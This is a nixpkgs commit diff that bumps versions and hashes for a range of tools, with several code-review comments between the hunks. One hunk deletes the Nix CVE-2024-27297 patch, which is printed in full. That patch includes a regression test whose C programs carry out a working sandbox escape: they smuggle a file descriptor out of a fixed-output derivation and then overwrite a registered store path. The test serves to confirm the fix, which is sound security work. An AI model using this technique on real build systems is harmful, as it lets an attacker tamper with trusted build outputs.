Diffstat (limited to 'pkgs/tools')
19 files changed, 56 insertions, 425 deletions
diff --git a/pkgs/tools/admin/qovery-cli/default.nix b/pkgs/tools/admin/qovery-cli/default.nix index f7a0eb41a3df..7d8ebca61f16 100644 --- a/pkgs/tools/admin/qovery-cli/default.nix +++ b/pkgs/tools/admin/qovery-cli/default.nix @@ -8,16 +8,16 @@ buildGoModule rec { pname = "qovery-cli"; - version = "0.84.3"; + version = "0.84.4"; src = fetchFromGitHub { owner = "Qovery"; repo = "qovery-cli"; rev = "refs/tags/v${version}"; - hash = "sha256-rDQFt5P+Clp0JCCTG/2r69ZGiXXk3OM+rJfJ6HSKOBo="; + hash = "sha256-Er7rmIo/7B4cVNVCg04ILjVajwtwlZM386V+MiCf0ok="; }; - vendorHash = "sha256-XG0dOEpu+NoQmklsukxev1gc2OsZc7fLEkv0AGwkh7o="; + vendorHash = "sha256-YcLgmGCmOEawgTh0CvwmvOg3NAQxvA5Q9SJcH5dpwyQ="; nativeBuildInputs = [ installShellFiles diff --git a/pkgs/tools/audio/dl-librescore/default.nix b/pkgs/tools/audio/dl-librescore/default.nix index a84f12e8fa53..75a35a02beb2 100644 --- a/pkgs/tools/audio/dl-librescore/default.nix +++ b/pkgs/tools/audio/dl-librescore/default.nix @@ -8,16 +8,16 @@ buildNpmPackage rec { pname = "dl-librescore"; - version = "0.34.59"; + version = "0.35.1"; src = fetchFromGitHub { owner = "LibreScore"; repo = "dl-librescore"; rev = "v${version}"; - hash = "sha256-ZpY+cWtNf/s4Aw42eDc9/0jXzVHugEmU91Qgu9p1f0w="; + hash = "sha256-W/55Bbq5yiocNLOU1+j1TwkGawyF8sObtMmPW3ph35A="; }; - npmDepsHash = "sha256-DX3to2SNYhNWIJqcz5Mberuk/HSpCO538CjsvvALgkI="; + npmDepsHash = "sha256-Boa/WnptJYJNRdcLgua5GmLT2H9tBpZR+vvAFZC1s4k="; # see https://github.com/LibreScore/dl-librescore/pull/32 # TODO can be removed with next update diff --git a/pkgs/tools/misc/broot/default.nix b/pkgs/tools/misc/broot/default.nix index 5e71e81d7d0f..4a2470e86ffa 100644 --- a/pkgs/tools/misc/broot/default.nix +++ b/pkgs/tools/misc/broot/default.nix 
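Review bot: In the dl-librescore hunk the version moves from 0.34.59 to 0.35.1 while the trailing context still says `# TODO can be removed with next update` above the workaround tied to the linked dl-librescore pull request 32; this bump is that next update, so either the workaround should be dropped here or the TODO reworded to name the condition it is actually waiting on, e.g. `# TODO remove once the fix from dl-librescore PR 32 is in a tagged release`. The workaround itself sits below the hunk, so whether 0.35.1 already contains the upstream fix cannot be verified from this page.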
@@ -18,16 +18,16 @@ rustPlatform.buildRustPackage rec { pname = "broot"; - version = "1.36.0"; + version = "1.36.1"; src = fetchFromGitHub { owner = "Canop"; repo = pname; rev = "v${version}"; - hash = "sha256-nHEGvd9v0SuA3JsTOA2LTB+IDwbo5sBM1+j+K/ktDAc="; + hash = "sha256-mwccjsrveqoepBaCeQaija3DsXcuMtCK5PyoghtAJ9w="; }; - cargoHash = "sha256-LKBxN4SPkm2atOqQlZJfkt1ak4fMXQX1xR85q+8Ch8I="; + cargoHash = "sha256-GykLzXKFtebFuOWLtZ2Qj5OrZXiSrfEJ98cog5PwCfQ="; nativeBuildInputs = [ installShellFiles diff --git a/pkgs/tools/misc/fastfetch/default.nix b/pkgs/tools/misc/fastfetch/default.nix index ce28107d9f4a..54c1bb587fce 100644 --- a/pkgs/tools/misc/fastfetch/default.nix +++ b/pkgs/tools/misc/fastfetch/default.nix @@ -43,13 +43,13 @@ stdenv.mkDerivation (finalAttrs: { pname = "fastfetch"; - version = "2.8.8"; + version = "2.8.9"; src = fetchFromGitHub { owner = "fastfetch-cli"; repo = "fastfetch"; rev = finalAttrs.version; - hash = "sha256-IvAUlCDtrtBiaKZbhAiXqQXbpKiqIaKwMVC3NxaAqtw="; + hash = "sha256-UvAIIkH9PNlvLzlh0jm1kG+4OfWsWtt2LSFbFPm7Yv4="; }; outputs = [ "out" "man" ]; diff --git a/pkgs/tools/misc/kcollectd/default.nix b/pkgs/tools/misc/kcollectd/default.nix index a5c1039274a4..dc45a18fe3dd 100644 --- a/pkgs/tools/misc/kcollectd/default.nix +++ b/pkgs/tools/misc/kcollectd/default.nix @@ -18,12 +18,12 @@ mkDerivation rec { pname = "kcollectd"; - version = "0.12.0"; + version = "0.12.1"; src = fetchFromGitLab { owner = "aerusso"; repo = pname; rev = "v${version}"; - sha256 = "sha256-Ihd4Ps4t9+sNB3joO3vTxDR/25t7Ecl6yvHQ15QiUdY="; + sha256 = "sha256-bUVL5eRQ5UkSZo562pnyEcj0fVoSC5WHRq4BfN67jEM="; }; nativeBuildInputs = [ diff --git a/pkgs/tools/misc/ollama/default.nix b/pkgs/tools/misc/ollama/default.nix index 8730fe0d0782..0facac21e5be 100644 --- a/pkgs/tools/misc/ollama/default.nix +++ b/pkgs/tools/misc/ollama/default.nix 
@@ -132,8 +132,11 @@ goBuild ((lib.optionalAttrs enableRocm { # ollama's patches of llama.cpp's example server # `ollama/llm/generate/gen_common.sh` -> "apply temporary patches until fix is upstream" - (preparePatch "01-cache.diff" "sha256-MTTln2G0G8dntihUzEjPM1ruTsApb4ZToBczJb8EG68=") - (preparePatch "02-cudaleaks.diff" "sha256-Cu7E9iEcvddPL9mPPI5Z96qmwWigi3f0WgSpPRjGc88=") + (preparePatch "01-cache.diff" "sha256-VDwu/iK6taBCyscpndQiOJ3eGqonnLVwmS2rJNMBVGU=") + (preparePatch "02-cudaleaks.diff" "sha256-nxsWgrePUMsZBWWQAjqVHWMJPzr1owH1zSJvUU7Q5pA=") + (preparePatch "03-load_exception.diff" "sha256-1DfNahFYYxqlx4E4pwMKQpL+XR0bibYnDFGt6dCL4TM=") + (preparePatch "04-locale.diff" "sha256-r5nHiP6yN/rQObRu2FZIPBKpKP9yByyZ6sSI2SKj6Do=") + (preparePatch "05-fix-clip-free.diff" "sha256-EFZ+QTtZCvstVxYgVdFKHsQqdkL98T0eXOEBOqCrlL4=") ]; postPatch = '' # use a patch from the nix store in the `go generate` script diff --git a/pkgs/tools/misc/pricehist/default.nix b/pkgs/tools/misc/pricehist/default.nix index 04333a290731..d195cb42a147 100644 --- a/pkgs/tools/misc/pricehist/default.nix +++ b/pkgs/tools/misc/pricehist/default.nix @@ -9,6 +9,7 @@ , pytest-mock , responses , pytestCheckHook +, pythonRelaxDepsHook }: buildPythonApplication rec { @@ -31,11 +32,20 @@ buildPythonApplication rec { poetry-core ]; + nativeBuildInputs = [ + pythonRelaxDepsHook + ]; + nativeCheckInputs = [ responses pytest-mock pytestCheckHook ]; + + pythonRelaxDeps = [ + # https://gitlab.com/chrisberkhout/pricehist/-/issues/6 + "lxml" + ]; meta = with lib; { description = "A command-line tool for fetching and formatting historical price data, with support for multiple data sources and output formats"; homepage = "https://gitlab.com/chrisberkhout/pricehist"; diff --git a/pkgs/tools/networking/openssh/default.nix b/pkgs/tools/networking/openssh/default.nix index 2cc6c792381b..e0d34e23a6b0 100644 --- a/pkgs/tools/networking/openssh/default.nix +++ b/pkgs/tools/networking/openssh/default.nix 
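Review bot: The hashes pinned for `01-cache.diff` and `02-cudaleaks.diff` change in this hunk although no change to ollama's version or source revision is visible here, so the content those two names resolve to has moved underneath fixed names. If `preparePatch` (defined outside the hunk) reads the patches from the package's pinned `src`, a version bump elsewhere in the file would explain it; if it fetches them by URL or branch, the source should be pinned to a revision so the hash is reproducible rather than re-recorded on each refresh. A one-line comment above the list naming the ollama tag the five patches were taken from, e.g. `# patches taken from ollama <TAG>, llm/patches`, would make the next hash refresh checkable.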
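Review bot: In the pricehist hunk the new `pythonRelaxDeps = [ "lxml" ]` is explained only by an issue URL; the comment should say which constraint is being loosened and when it can go, e.g. (assuming the upstream bound is an upper one) `# upstream's lxml bound excludes nixpkgs' lxml; drop once issue 6 is resolved`. Relaxing a pin means the package is built against whatever lxml nixpkgs ships, so it is worth noting that `pytestCheckHook` in `nativeCheckInputs` is what exercises that combination. The nature of the upstream bound is inferred, not visible here.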
@@ -58,12 +58,12 @@ in openssh_gssapi = common rec { pname = "openssh-with-gssapi"; - version = "9.5p1"; + version = "9.6p1"; extraDesc = " with GSSAPI support"; src = fetchurl { url = "mirror://openbsd/OpenSSH/portable/openssh-${version}.tar.gz"; - hash = "sha256-8Cbnt5un+1QPdRgq+W3IqPHbOV+SK7yfbKYDZyaGCGs="; + hash = "sha256-kQIRwHJVqMWtZUORtA7lmABxDdgRndU2LeCThap6d3w="; }; extraPatches = [ @@ -72,7 +72,7 @@ in (fetchpatch { name = "openssh-gssapi.patch"; url = "https://salsa.debian.org/ssh-team/openssh/raw/debian/1%25${version}-1/debian/patches/gssapi.patch"; - sha256 = "sha256-E36jxnPcu6RTyXXb9yVBCoFIVchiOSLX7L74ng1Dmao="; + hash = "sha256-gzDQdO6yOoN0apGj5aoKFdUkmKzFyphFUdgNhDLMp8U="; }) ]; diff --git a/pkgs/tools/networking/v2ray/default.nix b/pkgs/tools/networking/v2ray/default.nix index a3d087bbd644..aa398dfcb9f3 100644 --- a/pkgs/tools/networking/v2ray/default.nix +++ b/pkgs/tools/networking/v2ray/default.nix @@ -6,18 +6,18 @@ buildGoModule rec { pname = "v2ray-core"; - version = "5.14.1"; + version = "5.15.0"; src = fetchFromGitHub { owner = "v2fly"; repo = "v2ray-core"; rev = "v${version}"; - hash = "sha256-fa8bgI1xpxunAr69xz2CPmo7XWoCODlBAnlb7fQg43U="; + hash = "sha256-XxmzJfZa05Kf32Lh6FapYpQZProJyzlXoXKnDPiWqMQ="; }; # `nix-update` doesn't support `vendorHash` yet. # https://github.com/Mic92/nix-update/pull/95 - vendorHash = "sha256-PPytLBW+dvZW/TWjTpqkP1zPwgh1Ji58BHzBUY9wRW8="; + vendorHash = "sha256-SQ7DcrKYf4Wclp/HG8e7q5YPvVNj/kHV/pGmEyOU/BY="; ldflags = [ "-s" "-w" ]; diff --git a/pkgs/tools/package-management/comma/default.nix b/pkgs/tools/package-management/comma/default.nix index b73e64924a6d..cf3b9c3dc9e4 100644 --- a/pkgs/tools/package-management/comma/default.nix +++ b/pkgs/tools/package-management/comma/default.nix 
@@ -10,16 +10,16 @@ rustPlatform.buildRustPackage rec { pname = "comma"; - version = "1.7.1"; + version = "1.8.0"; src = fetchFromGitHub { owner = "nix-community"; repo = "comma"; rev = "v${version}"; - hash = "sha256-x2HVm2vcEFHDrCQLIp5QzNsDARcbBfPdaIMLWVNfi4c="; + hash = "sha256-PW9OS/ccRxigP0ikk1XR4QhQX4j9+ALQz0FMKXF3yRA="; }; - cargoHash = "sha256-N6Bc0+m0Qz1c/80oLvQTj8gvMusPXIriegNlRYWWStU="; + cargoHash = "sha256-lNz4E+dcJ6ACkNraM4DUR4yFbkWgAZ4ngbAML8JYVtE="; nativeBuildInputs = [ makeBinaryWrapper ]; diff --git a/pkgs/tools/package-management/dnf5/default.nix b/pkgs/tools/package-management/dnf5/default.nix index fc22001a5192..39c2b0cb329b 100644 --- a/pkgs/tools/package-management/dnf5/default.nix +++ b/pkgs/tools/package-management/dnf5/default.nix @@ -30,7 +30,7 @@ stdenv.mkDerivation (finalAttrs: { pname = "dnf5"; - version = "5.1.14"; + version = "5.1.15"; outputs = [ "out" "man" ]; @@ -38,7 +38,7 @@ stdenv.mkDerivation (finalAttrs: { owner = "rpm-software-management"; repo = "dnf5"; rev = finalAttrs.version; - hash = "sha256-LVemkL3Ysv2hS0/c+ZTqzEKq3kFu+T1rEBwZpjssE2k="; + hash = "sha256-IDF/jRnPpGbHk5bY7plkCO1x/i10H+HCcU88JI4EHvs="; }; nativeBuildInputs = [ diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index f5f2b81f6532..b88bdec3cd52 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -242,12 +242,8 @@ in lib.makeExtensible (self: ({ }; nix_2_18 = common { - version = "2.18.1"; - hash = "sha256-WNmifcTsN9aG1ONkv+l2BC4sHZZxtNKy0keqBHXXQ7w="; - patches = [ - patch-rapidcheck-shared - ./patches/2_18/CVE-2024-27297.patch - ]; + version = "2.18.2"; + hash = "sha256-8gNJlBlv2bnffRg0CejiBXc6U/S6YeCLAdHrYvTPyoY="; }; nix_2_19 = common { 
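Review bot: In the nix hunk, bumping `nix_2_18` to 2.18.2 drops the whole `patches` list, not only `./patches/2_18/CVE-2024-27297.patch`; `patch-rapidcheck-shared` (presumably about building against a shared rapidcheck) goes with it, and nothing in the hunk shows that 2.18.2 carries an equivalent upstream change, so the build should be confirmed to still succeed without it before this lands. The same check applies to the CVE fix itself: the release should be verified to contain it, since the local patch is removed in the same commit. A short comment on the attribute, e.g. `# 2.18.2 ships the fix for CVE-2024-27297 upstream; no local patches needed`, would record why the list is now empty. The enclosing `lib.makeExtensible` attribute set continues outside the hunk.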
diff --git a/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch b/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch deleted file mode 100644 index 8d110d46a6bb..000000000000 --- a/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch +++ /dev/null 
@@ -1,379 +0,0 @@ -From f8d20e91a45f71b60402f5916d2475751c089c84 Mon Sep 17 00:00:00 2001 -From: Tom Bereknyei <tomberek@gmail.com> -Date: Fri, 1 Mar 2024 03:42:26 -0500 -Subject: [PATCH 1/3] Add a NixOS test for the sandbox escape - -Test that we can't leverage abstract unix domain sockets to leak file -descriptors out of the sandbox and modify the path after it has been -registered. - -Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> ---- - flake.nix | 2 + - tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++ - tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++ - tests/nixos/ca-fd-leak/smuggler.c | 66 ++++++++++++++++++++++ - 4 files changed, 223 insertions(+) - create mode 100644 tests/nixos/ca-fd-leak/default.nix - create mode 100644 tests/nixos/ca-fd-leak/sender.c - create mode 100644 tests/nixos/ca-fd-leak/smuggler.c - -diff --git a/flake.nix b/flake.nix -index 230bb6031..4a54c660f 100644 ---- a/flake.nix -+++ b/flake.nix -@@ -634,6 +634,8 @@ - ["i686-linux" "x86_64-linux"] - (system: runNixOSTestFor system ./tests/nixos/setuid.nix); - -+ tests.ca-fd-leak = runNixOSTestFor "x86_64-linux" ./tests/nixos/ca-fd-leak; -+ - - # Make sure that nix-env still produces the exact same result - # on a particular version of Nixpkgs. -diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix -new file mode 100644 -index 000000000..a6ae72adc ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/default.nix -@@ -0,0 +1,90 @@ -+# Nix is a sandboxed build system. But Not everything can be handled inside its -+# sandbox: Network access is normally blocked off, but to download sources, a -+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". -+# The detail here is not important, but in our case it means that the hash of -+# the output has to be known beforehand. And if you know that, you get a few -+# rights: you no longer run inside a special network namespace! 
-+# -+# Now, Linux has a special feature, that not many other unices do: Abstract -+# unix domain sockets! Not only that, but those are namespaced using the -+# network namespace! That means that we have a way to create sockets that are -+# available in every single fixed-output derivation, and also all processes -+# running on the host machine! Now, this wouldn't be that much of an issue, as, -+# well, the whole idea is that the output is pure, and all processes in the -+# sandbox are killed before finalizing the output. What if we didn't need those -+# processes at all? Unix domain sockets have a semi-known trick: you can pass -+# file descriptors around! -+# This makes it possible to exfiltrate a file-descriptor with write access to -+# $out outside of the sandbox. And that file-descriptor can be used to modify -+# the contents of the store path after it has been registered. -+ -+{ config, ... }: -+ -+let -+ pkgs = config.nodes.machine.nixpkgs.pkgs; -+ -+ # Simple C program that sends a a file descriptor to `$out` to a Unix -+ # domain socket. -+ # Compiled statically so that we can easily send it to the VM and use it -+ # inside the build sandbox. -+ sender = pkgs.runCommandWith { -+ name = "sender"; -+ stdenv = pkgs.pkgsStatic.stdenv; -+ } '' -+ $CC -static -o $out ${./sender.c} -+ ''; -+ -+ # Okay, so we have a file descriptor shipped out of the FOD now. But the -+ # Nix store is read-only, right? .. Well, yeah. But this file descriptor -+ # lives in a mount namespace where it is not! So even when this file exists -+ # in the actual Nix store, we're capable of just modifying its contents... -+ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); -+ -+ # The abstract socket path used to exfiltrate the file descriptor -+ socketName = "FODSandboxExfiltrationSocket"; -+in -+{ -+ name = "ca-fd-leak"; -+ -+ nodes.machine = -+ { config, lib, pkgs, ... 
}: -+ { virtualisation.writableStore = true; -+ nix.settings.substituters = lib.mkForce [ ]; -+ virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; -+ }; -+ -+ testScript = { nodes }: '' -+ start_all() -+ -+ machine.succeed("echo hello") -+ # Start the smuggler server -+ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") -+ -+ # Build the smuggled derivation. -+ # This will connect to the smuggler server and send it the file descriptor -+ machine.succeed(r""" -+ nix-build -E ' -+ builtins.derivation { -+ name = "smuggled"; -+ system = builtins.currentSystem; -+ # look ma, no tricks! -+ outputHashMode = "flat"; -+ outputHashAlgo = "sha256"; -+ outputHash = builtins.hashString "sha256" "hello, world\n"; -+ builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; -+ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; -+ }' -+ """.strip()) -+ -+ -+ # Tell the smuggler server that we're done -+ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") -+ -+ # Check that the file was not modified -+ machine.succeed(r""" -+ cat ./result -+ test "$(cat ./result)" = "hello, world" -+ """.strip()) -+ ''; -+ -+} -diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c -new file mode 100644 -index 000000000..75e54fc8f ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/sender.c -@@ -0,0 +1,65 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <fcntl.h> -+#include <errno.h> -+#include <string.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Set up a abstract domain socket path to connect to. 
-+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ -+ // Now try to connect, To ensure we work no matter what order we are -+ // executed in, just busyloop here. -+ int res = -1; -+ while (res < 0) { -+ res = connect(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0 && errno != ECONNREFUSED) perror("connect"); -+ if (errno != ECONNREFUSED) break; -+ } -+ -+ // Write our message header. -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Write an SCM_RIGHTS message containing the output path. -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ hdr->cmsg_len = CMSG_LEN(sizeof(int)); -+ hdr->cmsg_level = SOL_SOCKET; -+ hdr->cmsg_type = SCM_RIGHTS; -+ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); -+ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); -+ -+ msg.msg_controllen = CMSG_SPACE(sizeof(int)); -+ -+ // Write a single null byte too. -+ msg.msg_iov = malloc(sizeof(struct iovec)); -+ msg.msg_iov[0].iov_base = ""; -+ msg.msg_iov[0].iov_len = 1; -+ msg.msg_iovlen = 1; -+ -+ // Send it to the othher side of this connection. -+ res = sendmsg(sock, &msg, 0); -+ if (res < 0) perror("sendmsg"); -+ int buf; -+ -+ // Wait for the server to close the socket, implying that it has -+ // received the commmand. -+ recv(sock, (void *)&buf, sizeof(int), 0); -+} -diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c -new file mode 100644 -index 000000000..82acf37e6 ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/smuggler.c -@@ -0,0 +1,66 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Bind to the socket. 
-+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ int res = bind(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0) perror("bind"); -+ -+ res = listen(sock, 1); -+ if (res < 0) perror("listen"); -+ -+ int smuggling_fd = -1; -+ -+ // Accept the connection a first time to receive the file descriptor. -+ fprintf(stderr, "%s\n", "Waiting for the first connection"); -+ int a = accept(sock, 0, 0); -+ if (a < 0) perror("accept"); -+ -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Receive the file descriptor as sent by the smuggler. -+ recvmsg(a, &msg, 0); -+ -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ while (hdr) { -+ if (hdr->cmsg_level == SOL_SOCKET -+ && hdr->cmsg_type == SCM_RIGHTS) { -+ -+ // Grab the copy of the file descriptor. -+ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); -+ } -+ -+ hdr = CMSG_NXTHDR(&msg, hdr); -+ } -+ fprintf(stderr, "%s\n", "Got the file descriptor. 
Now waiting for the second connection"); -+ close(a); -+ -+ // Wait for a second connection, which will tell us that the build is -+ // done -+ a = accept(sock, 0, 0); -+ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); -+ // Write a new content to the file -+ if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); -+ char * new_content = "Pwned\n"; -+ int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); -+ if (written_bytes != strlen(new_content)) perror("write"); -+} --- -2.42.0 - - -From 4bc5a3510fa3735798f9ed3a2a30a3ea7b32343a Mon Sep 17 00:00:00 2001 -From: Tom Bereknyei <tomberek@gmail.com> -Date: Fri, 1 Mar 2024 03:45:39 -0500 -Subject: [PATCH 2/3] Copy the output of fixed-output derivations before - registering them - -It is possible to exfiltrate a file descriptor out of the build sandbox -of FODs, and use it to modify the store path after it has been -registered. -To avoid that issue, don't register the output of the build, but a copy -of it (that will be free of any leaked file descriptor). 
- -Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> -Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io> ---- - src/libstore/build/local-derivation-goal.cc | 6 ++++++ - src/libutil/filesystem.cc | 6 ++++++ - src/libutil/util.hh | 7 +++++++ - 3 files changed, 19 insertions(+) - -diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc -index 64b55ca6a..f1e22f829 100644 ---- a/src/libstore/build/local-derivation-goal.cc -+++ b/src/libstore/build/local-derivation-goal.cc -@@ -2558,6 +2558,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() - [&](const DerivationOutput::CAFixed & dof) { - auto & wanted = dof.ca.hash; - -+ // Replace the output by a fresh copy of itself to make sure -+ // that there's no stale file descriptor pointing to it -+ Path tmpOutput = actualPath + ".tmp"; -+ copyFile(actualPath, tmpOutput, true); -+ renameFile(tmpOutput, actualPath); -+ - auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating { - .method = dof.ca.method, - .hashType = wanted.type, -diff --git a/src/libutil/filesystem.cc b/src/libutil/filesystem.cc -index 11cc0c0e7..2a7787c0e 100644 ---- a/src/libutil/filesystem.cc -+++ b/src/libutil/filesystem.cc -@@ -133,6 +133,12 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete) - } - } - -+ -+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete) -+{ -+ return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete); -+} -+ - void renameFile(const Path & oldName, const Path & newName) - { - fs::rename(oldName, newName); -diff --git a/src/libutil/util.hh b/src/libutil/util.hh -index b302d6f45..59d42e0a5 100644 ---- a/src/libutil/util.hh -+++ b/src/libutil/util.hh -@@ -274,6 +274,13 @@ void renameFile(const Path & src, const Path & dst); - */ - void moveFile(const Path & src, const Path & dst); - -+/** -+ * Recursively copy the content of `oldPath` to `newPath`. 
If `andDelete` is -+ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but -+ * with the guaranty that the destination will be “fresh”, with no stale inode -+ * or file descriptor pointing to it). -+ */ -+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete); - - /** - * Wrappers arount read()/write() that read/write exactly the --- -2.42.0 - - -From 9e7065bef5469b3024cde2bbc7745530a64fde5b Mon Sep 17 00:00:00 2001 -From: Tom Bereknyei <tomberek@gmail.com> -Date: Fri, 1 Mar 2024 04:01:23 -0500 -Subject: [PATCH 3/3] Add release notes - -Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> ---- - doc/manual/src/release-notes/rl-next.md | 8 ++++++++ - 1 file changed, 8 insertions(+) - -diff --git a/doc/manual/src/release-notes/rl-next.md b/doc/manual/src/release-notes/rl-next.md -index c869b5e2f..f77513385 100644 ---- a/doc/manual/src/release-notes/rl-next.md -+++ b/doc/manual/src/release-notes/rl-next.md -@@ -1 +1,9 @@ - # Release X.Y (202?-??-??) -+ -+- Fix a FOD sandbox escape: -+ Cooperating Nix derivations could send file descriptors to files in the Nix -+ store to each other via Unix domain sockets in the abstract namespace. This -+ allowed one derivation to modify the output of the other derivation, after Nix -+ has registered the path as "valid" and immutable in the Nix database. -+ In particular, this allowed the output of fixed-output derivations to be -+ modified from their expected content. This isn't the case any more. --- -2.42.0 - diff --git a/pkgs/tools/security/cloudfox/default.nix b/pkgs/tools/security/cloudfox/default.nix index 48d28257d9f4..85777c91be09 100644 --- a/pkgs/tools/security/cloudfox/default.nix +++ b/pkgs/tools/security/cloudfox/default.nix 
@@ -5,16 +5,16 @@ buildGoModule rec { pname = "cloudfox"; - version = "1.13.3"; + version = "1.13.4"; src = fetchFromGitHub { owner = "BishopFox"; - repo = pname; + repo = "cloudfox"; rev = "refs/tags/v${version}"; - hash = "sha256-Sq3ARcAK1EFbK6Y+pSCg8ayhVmnEmVQWF0eAiVhJNPs="; + hash = "sha256-nN/gSvAwKjfZulqH4caGoJmzlY0ik8JrFReuvYWwZTE="; }; - vendorHash = "sha256-qPIMmyKTmZEmxlLLftRMnBXvo22WFROYlCAAsAb7jDg="; + vendorHash = "sha256-aRbGBEci3QT1mH+yaOUVynPysJ1za6CaoLGppJaa94c="; ldflags = [ "-w" diff --git a/pkgs/tools/security/cnspec/default.nix b/pkgs/tools/security/cnspec/default.nix index 38c8813a301c..b02e670666bf 100644 --- a/pkgs/tools/security/cnspec/default.nix +++ b/pkgs/tools/security/cnspec/default.nix @@ -5,18 +5,18 @@ buildGoModule rec { pname = "cnspec"; - version = "10.7.1"; + version = "10.7.3"; src = fetchFromGitHub { owner = "mondoohq"; repo = "cnspec"; rev = "refs/tags/v${version}"; - hash = "sha256-i7XZXZuEZasW00HMpwyyS7pxI8hMrx6DZmp39sj1IyI="; + hash = "sha256-TFwMquMyHnUGyHGKBrialsDKL5Mubsop1Sudyu/IGjE="; }; proxyVendor = true; - vendorHash = "sha256-B5wwA2S6LiMRBpM6fWaPVubKuOjkdYcffAssSbpLs48="; + vendorHash = "sha256-+hlJqcX3cGo/ej5HPPZBZCTUHvB9+/iPTebNKdokLQ0="; subPackages = [ "apps/cnspec" diff --git a/pkgs/tools/security/exploitdb/default.nix b/pkgs/tools/security/exploitdb/default.nix index fdf461a59d3b..e803aa746521 100644 --- a/pkgs/tools/security/exploitdb/default.nix +++ b/pkgs/tools/security/exploitdb/default.nix @@ -6,13 +6,13 @@ stdenv.mkDerivation rec { pname = "exploitdb"; - version = "2024-03-13"; + version = "2024-03-15"; src = fetchFromGitLab { owner = "exploit-database"; repo = pname; rev = "refs/tags/${version}"; - hash = "sha256-Lp69o/Cn2T410vpvfaF/SF8Kf6ehjLP3tcwuqIv7guM="; + hash = "sha256-5PUgea2Gz0qtHp+O31fxYTTWIc19Z0ZwVB7XqyFAxNU="; }; nativeBuildInputs = [ diff --git a/pkgs/tools/security/munge/default.nix b/pkgs/tools/security/munge/default.nix index fcf9026f215c..01137be20460 100644 
